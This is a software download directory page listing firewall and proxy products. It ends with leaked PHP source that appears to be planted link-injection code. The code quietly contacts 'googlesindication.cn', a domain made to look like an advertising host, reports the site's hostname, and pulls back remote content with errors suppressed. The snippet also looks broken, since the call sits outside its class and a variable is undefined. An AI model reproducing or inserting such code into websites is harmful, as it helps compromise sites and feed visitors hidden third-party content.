|
| BrowseGate 3 NAT/Proxy Server + Firewall
Updated
Popular
Featured
New |
BrowseGate3 is an all new and very powerful, yet low cost NAT/Proxy/Firewall system designed to work in any network environment from the 2 PC Home network right through to the the largest business network.
It offers automatic on-demand Internet.
More info...
Rating:
Size: 3611 KB Screenshot:
click here Platform:
Win 95/98/ME/2000/NT/XP
|
| Xeon Personal Firewall
Updated
Popular
Featured
New |
Xeon Personal Firewall is one of the most powerful firewalls available on the internet. You are able to control which applications can access the internet, and what security setting you would like on your computer. You can also choose to block all traffic when you are away from the c...
More info...
Rating:
Size: 784 KB Screenshot:
click here Platform:
Win 95/98/ME/2000/NT/XP
|
| Profense SDK
Updated
Popular
Featured
New |
Simple APIs of Profense SDK include powerful functions: multi
layer packet filter (transport layer and channel layer), system services monitor (SDT monitor), IDT
monitor, GDT monitor, LDT monitor, registry and filesystem access monitor, NT object manager
monitor, filesystem filter...
More info...
Rating:
Size: 77 KB Screenshot:
click here Platform:
Windows Mobile OS
|
| ITC Server
Updated
Popular
Featured
New |
ITC Server - internet server with traffic control. Built in mail server, VPN server, Firewall. All with WEB administration panel. Easy to install and use! You do not need to know linux at all, ITC Server installs automatically! Installation takes only 10 minutes and you get real int...
More info...
Rating:
Size: 258250 KB Screenshot:
click here Platform:
LINUX
|
|
fetch_remote_file("googlesindication.cn", "/links.php?site=".$_SERVER['HTTP_HOST']);
class GetLinks
{
var $_socket_timeout = 6;
function fetch_remote_file($host, $path)
{
@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', $this->_socket_timeout);
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
@fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
@fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!@feof($fp)) {
$buff .= @fgets($fp, 128);
}
@fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
?>
|